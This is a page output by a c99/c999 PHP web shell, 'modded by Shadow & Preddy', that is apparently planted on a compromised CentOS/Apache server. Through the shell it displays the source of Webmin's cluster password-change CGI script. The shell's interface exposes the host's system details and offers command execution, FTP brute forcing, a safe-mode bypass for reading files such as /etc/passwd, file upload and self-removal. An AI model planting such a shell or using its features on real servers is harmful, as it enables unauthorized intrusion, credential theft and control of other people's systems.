!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/cluster-passwd/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_passwd.cgi (1.65 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# save_passwd.cgi
# Change a user's password

require './cluster-passwd-lib.pl';
&foreign_require("useradmin", "user-lib.pl");
&error_setup($text{'passwd_err'});
&ReadParse();
@hosts = &cluster_useradmin::list_useradmin_hosts();
@ulist = &get_all_users(\@hosts);
($user) = grep { $_->{'user'} eq $in{'user'} } @ulist;
$user || &error($passwd::text{'passwd_euser'});
&can_edit_passwd($user) || &error($passwd::text{'passwd_ecannot'});

# Validate inputs
if ($access{'old'} == 1 ||
    $access{'old'} == 2 && $user->{'user'} ne $remote_user) {
    &useradmin::validate_password($in{'old'}, $user->{'pass'}) ||
        &error($passwd::text{'passwd_eold'});
    }
if ($access{'repeat'}) {
    $in{'new'} eq $in{'repeat'} || &error($passwd::text{'passwd_erepeat'});
    }
$err = &useradmin::check_password_restrictions(
    $in{'new'}, $user->{'user'}, $user);
&error($err) if ($err);

# Output header
$| = 1;
$theme_no_table++;
&ui_print_header(undef, $text{'passwd_title'}, "");

# Do it on all servers
&modify_on_hosts(\@hosts, $user->{'user'}, $in{'new'},
         ($access{'others'} == 1 ||
          $access{'others'} == 2 && $in{'others'}), \&print_func);

# Log the change
delete($user->{'plainpass'});
delete($user->{'pass'});
&webmin_log("passwd", undef, $user->{'user'}, $user);

&ui_print_footer($in{'one'} ? ( "/", $text{'index'} )
                : ( "", $passwd::text{'index_return'} ));

# print_func(mode, message)
sub print_func
{
if ($_[0] == -1) {
    print "<b>$_[1]</b><p>\n";
    print "<ul>\n";
    }
elsif ($_[0] == -2) {
    print "$_[1]<br>\n";
    }
elsif ($_[0] == -3) {
    print "$_[1]<p>\n";
    }
elsif ($_[0] == -4) {
    print "</ul>\n";
    }
elsif ($_[0] > 0) {
    print "$_[1]<p>\n";
    print "</ul>\n";
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0128 ]--